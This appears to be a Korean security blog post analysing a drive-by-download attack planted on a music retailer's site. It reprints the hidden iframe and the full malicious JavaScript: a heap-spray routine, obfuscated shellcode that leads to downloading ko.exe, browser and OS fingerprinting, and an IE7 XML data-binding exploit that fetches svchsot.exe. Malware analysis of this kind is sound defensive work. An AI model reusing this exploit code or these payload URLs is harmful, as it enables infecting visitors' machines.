발견지 : http://www.leesmusic.co.kr [리스뮤직]
→http://www.leesmusic.co.kr/./lees/index.php
(<iframe src=http://seoul-kla.com/admin/data/webedit/1.htm width=0 height=0></iframe>)
→http://www.7iaa.com/index.html (서버죽음)
→http://seoul-kla.com/admin/data/webedit/1.htm
→ http://www.baikec.cn/down/ko.exe(복호화 최종파일)
→ http://seoul-kla.com/admin/data/webedit/svchsot.exe(스크립트 내 연결 파일)
<http://seoul-kla.com/admin/data/webedit/1.htm>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace
("about:blank");
~>user agent의 정보얻은후 msie 7 ->location.replace about:blank
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
~> dadong -> %u replace
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="dadong";
spray
(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadon
g5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981
dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122
dadong4921[생략]dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2
121dadong2121dadong0021");
~> dadong -> %u replace-> http://www.baikec.cn/down/ko.exe 연결!
sleep(3000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
~> MSIE 버전 확인
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image
SRC=http://rਊr.book.com
~> MSIE 7 버전 확인 -> 시스템 정보 확인 (windows 2003, windows xp) -> xml 취약점 실행!
src="http://seoul-kla.com/admin/data/webedit/svchsot.exe"]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
요즘에 잠잠했던 xml 취약점을 이용하여 악성코드를 유포하는 방식을 오랜만에 보았다!
ie 버전과 시스템 버전을 확인하여 유포할수도 있고 쉘코드에서도 유포할 수 있는 방식이 사용된걸 볼 수있었다.
현재는 많이 알려져서 패치가 되었지만 그래도 아직까지 사용하는거 보니 패치가 안되어있는 사람도 많은거 같다!
'security > 악성코드 유포' 카테고리의 다른 글
| HEX 값으로 유포하는 악성 Iframe Script (0) | 2013.01.24 |
|---|---|
| 골칫덩어리! JSXX 0.44 VIP 디코딩 ! (2) | 2012.12.23 |
| 구인 사이트 교차로 → http://www.icross.co.kr Yszz 0.11 vip 악성 스크립트 유포중!! (0) | 2012.11.03 |
| 중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!! (0) | 2012.11.02 |
| 우연히 발견한 악성스크립트 ! (3) | 2012.10.16 |